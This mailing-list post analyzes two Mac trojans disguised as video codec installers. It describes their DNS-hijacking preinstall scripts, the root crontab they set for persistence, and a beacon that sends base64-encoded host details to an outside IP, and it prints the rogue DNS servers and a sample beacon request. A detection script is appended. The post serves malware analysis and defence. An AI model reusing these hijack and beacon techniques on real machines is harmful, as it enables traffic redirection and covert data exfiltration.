To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
I've analyzed two variants of this trojan, procoded1000.dmg and
ultracodec1000.dmg, provided to me by Chris (thanks, Chris!).

These trojans basically consist of three scripts and a browser plugin
(used by Safari / Firefox?  I'm not sure.).

On the disk image:
- install.pkg/Contents/Resources/post{install,upgrade} are the same
script
- install.pkg/Contents/Resources/pre{install,upgrade} are the same script
- plugins.settings (from Archive.pax.gz, located in install.pkg/Contents) is
the same as above preinstall scripts


The only difference between the two packages appears to be the DNS servers:
procodec1000:
s1=85.255.116.61
s2=85.255.112.103

ultracodec1000:
s1=85.255.115.34
s2=85.255.112.158

- The preinstall scripts (and plugins.settings from Archive.pax.gz, which
is the same) set the compromised machine's DNS to the above servers
(depending on which trojan is installed).  In addition, the script tries to set
a crontab for root that executes itself (as
/Library/Internet Plug-Ins/plugins.settings) once a minute.

- The postinstall scripts execute sendreq (found in Archive.pax.gz), and
then remove sendreq.  sendreq sends 'mac;<cpu type>;<hostname>' as a
base64-encoded argument in the 'Accept-Language' header to
85.255.121.37.

Example:
GET / HTTP/1.1
Accept-Language: bWFjO3Vua25vd247ZXJpYWRvcg==
Host: 85.255.121.37


- Installs
/Library/Internet Plug-Ins/Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin
I'm not certain what this does.  There's not much by way of suspicious
strings in this executable, and I don't have a way to safely execute it
to watch what it does.


Interesting strings (for antivirus or overly suspicious sysadmins :) ):
install.pkg/Contents/Resources/English.lproj/Description.plist:
<string>Its a suppa puppa desc yo</string>

In Archive.pax.gz:
Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.bak:
Verified RoveSupa Plugin

Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.ROVE:
Verified RoveSupa Plugin

On Sun, Nov 04, 2007 at 09:11:03AM -0500, Chris Lee babbled thus:
> Sure, I saved a couple copies.  I'll send you a link in a second email.  If 
> anyone else is interested in a copy, please let me know.

-- 
PinkFreud
Chief of Security, Nightstar IRC network
irc.nightstar.net | www.nightstar.net
Server Administrator - Blargh.CA.US.Nightstar.Net
Unsolicited advertisements sent to this address are NOT welcome.
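The sendreq beacon and the rogue DNS settings described in the analysis above, turned into a check a defender can run over captured HTTP requests and a resolv.conf. This is an added example, not part of the original post; the sample requests and resolver file are constructed (the beacon value is the one quoted in the analysis).

```python
import base64
import binascii
import re

# Beacon format reported for sendreq: 'mac;<cpu type>;<hostname>', base64-encoded
# and carried as the Accept-Language header value.
BEACON_RE = re.compile(r"^mac;[^;]+;[^;]+$")

# Rogue DNS servers listed in the analysis (procodec1000 / ultracodec1000).
ROGUE_DNS = {"85.255.116.61", "85.255.112.103", "85.255.115.34", "85.255.112.158"}


def decode_beacon(header_value):
    """Return the decoded 'mac;cpu;host' string if the Accept-Language value
    is the sendreq beacon, else None.  Real language tags (e.g. 'en-US,en;q=0.9')
    are not valid base64, so they fail the strict decode."""
    try:
        decoded = base64.b64decode(header_value, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    return decoded if BEACON_RE.match(decoded) else None


def scan_requests(raw):
    """Return (host, decoded_beacon) for every HTTP request in a blob of captured
    requests (separated by blank lines) whose Accept-Language header is the beacon."""
    hits = []
    for req in re.split(r"\r?\n\r?\n", raw.strip()):
        headers = {}
        for line in req.splitlines()[1:]:          # skip the request line
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        beacon = decode_beacon(headers.get("accept-language", ""))
        if beacon:
            hits.append((headers.get("host", "?"), beacon))
    return hits


def rogue_resolvers(resolv_conf):
    """Return nameserver entries from resolv.conf text that match the rogue DNS list."""
    servers = re.findall(r"^\s*nameserver\s+(\S+)", resolv_conf, re.MULTILINE)
    return [s for s in servers if s in ROGUE_DNS]


# Constructed sample: the beacon request from the analysis plus a benign request.
SAMPLE_REQUESTS = """GET / HTTP/1.1
Accept-Language: bWFjO3Vua25vd247ZXJpYWRvcg==
Host: 85.255.121.37

GET /index.html HTTP/1.1
Accept-Language: en-US,en;q=0.9
Host: www.example.com
"""
SAMPLE_RESOLV = "nameserver 85.255.116.61\nnameserver 85.255.112.103\n"

if __name__ == "__main__":
    print(scan_requests(SAMPLE_REQUESTS))   # [('85.255.121.37', 'mac;unknown;eriador')]
    print(rogue_resolvers(SAMPLE_RESOLV))
```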


_______________________________________________
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets